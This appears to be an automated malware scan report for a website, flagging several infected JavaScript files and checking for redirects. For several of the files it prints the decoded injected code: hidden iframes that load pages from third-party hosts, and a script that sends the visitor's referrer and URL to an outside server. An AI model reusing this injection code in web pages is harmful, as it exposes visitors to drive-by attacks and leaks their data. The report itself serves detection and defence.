Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=rcsscgop.com
Result: The website is marked by Google as suspicious: visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://rcsscgop.com/ | 200 OK Content-Length: 20190 Content-Type: text/html | clean |
http://rcsscgop.com/media/system/js/caption.js | 200 OK Content-Length: 4880 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below). File excerpt (truncated): var JCaption = new Class({ initialize: function(selector) { this.selector = selector; var images = $$(selector); images.each(function(image){ this.createCaption(image); }, this); }, createCaption: function(element) { var caption = document.createTextNode(element.title); var container = document.createElement("div"); var text = document.createElement("p"); var width = element.getAttribute("width"); var align = [...] Note: the excerpt shown appears to be the file's regular caption code; the portion that triggered the detection is not reproduced for this file. Antivirus reports:
| ||
http://rcsscgop.com/templates/politicalxtc/js/jquery.js | 200 OK Content-Length: 58054 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){var l=this,g,y=l.jQuery,p=l.$,o=l.jQuery=l.$=function(E,F){return new o.fn.init(E,F)},D=/^[^<]*(<(.|\s)+>)[^>]*$|^#([\w-]+)$/,f=/^.[^:#\[\.,]*$/;o.fn=o.prototype={init:function(E,H){E=E||document;if(E.nodeType){this[0]=E;this.length=1;this.context=E;return this}if(typeof E==="string"){var G=D.exec(E);if(G&&(G[1]||!H)){if(G[1]){E=o.clean([G[1]],H)}else{var I=document.getElementById(G[3]);if(I&&I.id!=G[3]){return o().find(E)}var F=o(I||[]);F.context=document Antivirus reports:
| ||
http://rcsscgop.com/templates/politicalxtc/js/xtcMooMenu.js | 200 OK Content-Length: 4653 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below). File excerpt (truncated): function moomenu(container, menuClass, sp, a, tr, afps, cnt){ var topmenu; if(container == null) topmenu = $(document.body); else topmenu = $(container); if( !$defined(tr) ) tr = new Fx.Transition(Fx.Transitions.Quint.easeInOut); if( !$defined(afps) ) afps = 50; if( !$defined(cnt) ) cnt = false; if(topmenu) { var menus = topmenu.getElements('ul.' + menuClass); menus.each(function(menu){ menu.setStyles({'display':'block [...] Decoded script: var _escape='%3Cscript%3Edocument.write%28%27%3Cdiv%20name%3D%22vimeo%22%20style%3D%22display%3Anone%22%3E%3Ciframe%20width%3D%22560%22%20height%3D%22315%22%20src%3D%22http%3A//bentley.poststreetdental.com/direct.php%3Fpage%3D15f48be84d67654d%22%20frameborder%3D%220%22%20allowfullscreen%3E%3C/iframe%3E%3C/div%3E%27%29%3B%3C/script%3E';var OlI = document.createElement('script'); OlI.src = 'http://api.myobfuscate.com/?getsrc=ok'+'&ref='+encodeURIComponent(document.referrer)+'&url='+encodeURIComponent(document.URL); var OlO = document.getElementsByTagName('head')[0]; OlO.appendChild(OlI);document.write(unescape(_escape)); Summary: once unescaped, the injected script writes an iframe inside a display:none container that loads direct.php from a third-party host, and it appends a script element whose URL carries the visitor's referrer and the current page URL. Antivirus reports:
| ||
http://rcsscgop.com/templates/politicalxtc/js/scripts.js | 200 OK Content-Length: 9900 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) jQuery = jQuery.noConflict(); jQuery(document).ready(function() { jQuery("#footerOpen").click(function () { jQuery("#bottomModsWrap").toggle("slow", function(){ jQuery.scrollTo(jQuery('#bottomModsBGBottom')); if(jQuery('#bottomModsBG').is(':hidden')) { jQuery("#footerOpen").removeClass("close"); } else { jQuery("#footerOpen").addClass("close"); } }); }); var modTitleWrapWidth = jQuery('#userOne Antivirus reports:
| ||
http://rcsscgop.com/components/com_jcalpro/lib/shajax.js | 200 OK Content-Length: 12956 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below). File excerpt (truncated): if(typeof(shajax)=="undefined"){var shajax=new Object();} shajax.enabled=true;shajax.useCache=true;shajax.useCompression=false;shajax.enableDebug=false;shajax.enablePrefetch=true;shajax.maxCacheSize=400000;shajax.shajaxLiveSiteUrl='';shajax.shajaxProgressImage='';shajax.defaultProgressElement='shajaxProgress';shajax.shajaxUrlMap=new Array();shajax.toPrefetch=new Array();shajax.delayToPrefetch=400;shajax.addDOMLoadEvent=(function(){var load_events=[],load_timer,script,done,exec,old_onload,ini [...] Decoded script: var _escape='%3Cscript%3Edocument.write%28%27%3Cdiv%20name%3D%22vimeo%22%20style%3D%22display%3Anone%22%3E%3Ciframe%20width%3D%22560%22%20height%3D%22315%22%20src%3D%22http%3A//bentley.poststreetdental.com/direct.php%3Fpage%3D15f48be84d67654d%22%20frameborder%3D%220%22%20allowfullscreen%3E%3C/iframe%3E%3C/div%3E%27%29%3B%3C/script%3E';var OlI = document.createElement('script'); OlI.src = 'http://api.myobfuscate.com/?getsrc=ok'+'&ref='+encodeURIComponent(document.referrer)+'&url='+encodeURIComponent(document.URL); var OlO = document.getElementsByTagName('head')[0]; OlO.appendChild(OlI);document.write(unescape(_escape)); Antivirus reports:
| ||
http://rcsscgop.com/components/com_jcalpro/themes/default/template.js | 200 OK Content-Length: 7692 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below). File excerpt (truncated): function preloadImage() { var args = preloadImage.arguments; document.imageArray[args[0]] = new Array(args.length - 1); for ( var i = 1; i < args.length; i++) { document.imageArray[args[0]][i - 1] = new Image; document.imageArray[args[0]][i - 1].src = args[i]; } } function showOnBar(Str) { window.status = Str; return true; } function cOn(myObject, color) { if (document.getElementById || (document.all && !(docume [...] Decoded script: var _escape='%3Cscript%3Edocument.write%28%27%3Cdiv%20name%3D%22vimeo%22%20style%3D%22display%3Anone%22%3E%3Ciframe%20width%3D%22560%22%20height%3D%22315%22%20src%3D%22http%3A//bentley.poststreetdental.com/direct.php%3Fpage%3D15f48be84d67654d%22%20frameborder%3D%220%22%20allowfullscreen%3E%3C/iframe%3E%3C/div%3E%27%29%3B%3C/script%3E';var OlI = document.createElement('script'); OlI.src = 'http://api.myobfuscate.com/?getsrc=ok'+'&ref='+encodeURIComponent(document.referrer)+'&url='+encodeURIComponent(document.URL); var OlO = document.getElementsByTagName('head')[0]; OlO.appendChild(OlI);document.write(unescape(_escape)); Antivirus reports:
| ||
http://rcsscgop.com/modules/mod_jxtc_calendarwall/js/showcaseFX.js | 200 OK Content-Length: 20190 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below). File excerpt (truncated): if (typeof showcaseFX != 'function') { function showcaseFX(id, o){ var dix = $(id); if (dix) { var showcase = dix.getElement('.showcase' + id); if(showcase) { var frames = showcase.getElements('.sframe' + id); if(frames.length > 1) { var a = frames.length - 1; var b = 0; var fh = 0; var fw = 0; var f = {}; var fx; var fxReady = (o.fxpause == -1) ? true : false; [...] Decoded script: <div name="video" style="display:none"><iframe width="560" height="315" src="http://nissan.georgekohndds.com/direct.php?page=15f48be84d67654d" frameborder="0"></iframe></div><div name="youtube"><iframe width="1" height="1" src="http://www.deheide.be/count.php" frameborder="0" allowfullscreen></iframe></div> Summary: the decoded markup contains two iframes, one inside a display:none container that loads direct.php from a third-party host, and a second 1x1 iframe that loads count.php from another host. Antivirus reports:
| ||
http://rcsscgop.com/modules/mod_briaskISS/mod_briaskISS.js | 200 OK Content-Length: 7590 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below). File excerpt (truncated): function briaskISS(idModule, random, picInterval, transDelay, picArray) { this.picRandom = random; this.picInterval = picInterval; this.transDelay = transDelay; this.picArray = picArray; this.curPic = 0; this.nextPic = 0; this.numPics = 0; this.curOpacity = 99 this.nextOpacity = 0; this.idModule = idModule; this.initISS(); } briaskISS.prototype.initISS=function() { if (!document.getElementById || !document.createElement) [...] Decoded script: var _escape='%3Cscript%3Edocument.write%28%27%3Cdiv%20name%3D%22vimeo%22%20style%3D%22display%3Anone%22%3E%3Ciframe%20width%3D%22560%22%20height%3D%22315%22%20src%3D%22http%3A//bentley.poststreetdental.com/direct.php%3Fpage%3D15f48be84d67654d%22%20frameborder%3D%220%22%20allowfullscreen%3E%3C/iframe%3E%3C/div%3E%27%29%3B%3C/script%3E';var OlI = document.createElement('script'); OlI.src = 'http://api.myobfuscate.com/?getsrc=ok'+'&ref='+encodeURIComponent(document.referrer)+'&url='+encodeURIComponent(document.URL); var OlO = document.getElementsByTagName('head')[0]; OlO.appendChild(OlI);document.write(unescape(_escape)); Antivirus reports:
| ||
http://rcsscgop.com/plugins/system/blueflame/xajax/xajax_js/xajax_core.js | 200 OK Content-Length: 39876 Content-Type: application/x-javascript | clean |
http://rcsscgop.com/index.php?option=com_user&view=login | HTTP/1.1 301 Moved Permanently Connection: close Date: Thu, 18 Dec 2014 01:34:34 GMT Location: http://rcsscgop.com/Log-in.html Server: Apache Content-Length: 0 Content-Type: text/html P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Set-Cookie: 2efd091c6555978ee492856407cc9fbc=et5t1jvpvsulorkmdh95c5jr66; path=/ | clean |
http://rcsscgop.com/log-in.html | HTTP/1.1 301 Moved Permanently Connection: close Date: Thu, 18 Dec 2014 01:34:34 GMT Location: http://rcsscgop.com/Log-in.html Server: Apache Content-Length: 0 Content-Type: text/html P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Set-Cookie: 2efd091c6555978ee492856407cc9fbc=l0pngi3nhgdmg333i18mqtd637; path=/ | clean |
http://rcsscgop.com/test404page.js | 404 Not Found Content-Length: 393 Content-Type: text/html | clean |
http://rcsscgop.com/index.php?option=com_user&view=register | HTTP/1.1 301 Moved Permanently Connection: close Date: Thu, 18 Dec 2014 01:34:35 GMT Location: http://rcsscgop.com/Create-an-account.html Server: Apache Content-Length: 0 Content-Type: text/html P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Set-Cookie: 2efd091c6555978ee492856407cc9fbc=kvph9teaerlj08el93mu25gc52; path=/ | clean |
http://rcsscgop.com/create-an-account.html | HTTP/1.1 301 Moved Permanently Connection: close Date: Thu, 18 Dec 2014 01:34:36 GMT Location: http://rcsscgop.com/Create-an-account.html Server: Apache Content-Length: 0 Content-Type: text/html P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Set-Cookie: 2efd091c6555978ee492856407cc9fbc=evnbs50cbfh9eg38uuqnrq7he3; path=/ | clean |
http://rcsscgop.com/About-Us/how-to-find-us.html | 200 OK Content-Length: 18760 Content-Type: text/html | clean |
http://maps.google.com/maps?file=api&v=2.x&oe=utf-8&hl=en&key=ABQIAAAAKHT8LwLX7X86UNVi5DP0hxRM_9oo7vrDblMRKS0za8SGspUbEhSBGGrFG6ML_9PR4F-l_OIoPwBuFw&sensor=false&indexing=true | 200 OK Content-Length: 4224 Content-Type: text/javascript | clean |
http://rcsscgop.com/About-Us/officers.html | 200 OK Content-Length: 18089 Content-Type: text/html | clean |
http://rcsscgop.com/About-Us/committees-a-committee-chairs.html | 200 OK Content-Length: 17635 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: rcsscgop.com
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Thu, 18 Dec 2014 01:34:27 GMT
Pragma: no-cache
Server: Apache
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 18 Dec 2014 01:34:28 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: 2efd091c6555978ee492856407cc9fbc=6hkcn4v2t2lpg9i51rtprj65u3; path=/
GET / HTTP/1.1
Host: rcsscgop.com
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Thu, 18 Dec 2014 01:34:27 GMT
Pragma: no-cache
Server: Apache
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 18 Dec 2014 01:34:28 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: 2efd091c6555978ee492856407cc9fbc=6hkcn4v2t2lpg9i51rtprj65u3; path=/
Second query (visit from search engine):
GET / HTTP/1.1
Host: rcsscgop.com
Referer: http://www.google.com/search?q=rcsscgop.com
Result:
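The result is similar to the first query. No suspicious redirects were found. Only the Referer header differs between the two queries shown, so a redirect conditioned on other request properties (for example the User-Agent or cookies) would not show up in this comparison.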
GET / HTTP/1.1
Host: rcsscgop.com
Referer: http://www.google.com/search?q=rcsscgop.com
Result:
The result is similar to the first query. There are no suspicious redirects found.